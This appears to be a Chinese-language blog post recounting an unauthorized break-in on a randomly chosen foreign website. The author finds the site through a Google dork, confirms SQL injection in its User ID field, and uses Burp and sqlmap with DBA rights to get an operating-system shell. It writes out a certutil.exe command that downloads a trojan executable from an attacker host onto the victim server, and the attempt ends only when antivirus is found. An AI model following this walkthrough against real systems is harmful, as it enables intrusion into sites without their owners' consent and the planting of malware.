0x00:尋找漏洞點
某天閒著無聊用谷歌語法inurl:aspx?id=找到一個國外的某個站點。功能點比較簡單隻有一個User ID:
0x01:檢測功能點
由於只有搜尋框我們先來一個單引號看他是否報錯報。
我們發現報錯了單引號,我們再來一個單引號測試一下看看能不能回顯,頁面正常。
我們發現隨便輸入點內容網站回顯正常提示xxxx。說明有可能存在sql注入,我們繼續往下看。
0x02:資訊收集
這裡利用火狐瀏覽器的Wappalyzer外掛看了一下網站資訊。IIS版本為7。5有檔案上傳IIS解析漏洞。
下面是用線上網站探查到的埠情況,還開一個1433埠。
0x03:Burp抓包+sqlmap檢測
既然剛才前面的輸入框會引起報錯有可能存在sql注入那我是否可以考慮抓個數據包放到sqlmap裡面跑跑看能不能跑出一些關鍵資訊。下面利用Burp抓到包然後儲存為x。txt。這裡們加*號就是指定注入點。
放到sqlmap裡面,已經提示可以注入。
我們繼續往下看,下面是注入點。
有堆疊注入我們看看堆疊可以直接sqlmap ——is-dba 看看是不是管理員許可權如果我們可以利用sqlmap –-os-shelll 直接寫入木馬 拿到webshell或者反彈shell直接
這裡看到dba的許可權為True代表有機會寫入一句話從而獲取到也給低許可權的shell。
這裡可以直接sqlmap –os-shell,當出現os-shell的時候代表成功。
我們輸入一條ipconfig簡單命令看看能不能執行成功。然後判斷目標是否出網!如果不出網那傳木馬上去就扯犢子了,可以選擇傳webshell。
我們可以看到命令可以執行
接下可以使用certutil。exe去接收一個惡意的檔案。
命令certutil。exe -urlcache -
split
-f http:
//192。168。163。128:8080/artifact。exe c:\artifact。exe // c:\artifact。exe是儲存路徑
這條命令遠端下載檔案木馬儲存到受害機上去
先檢視一下當前的程序。
然後使用線上的防毒識別。結果發現還真有防護,就此放棄……
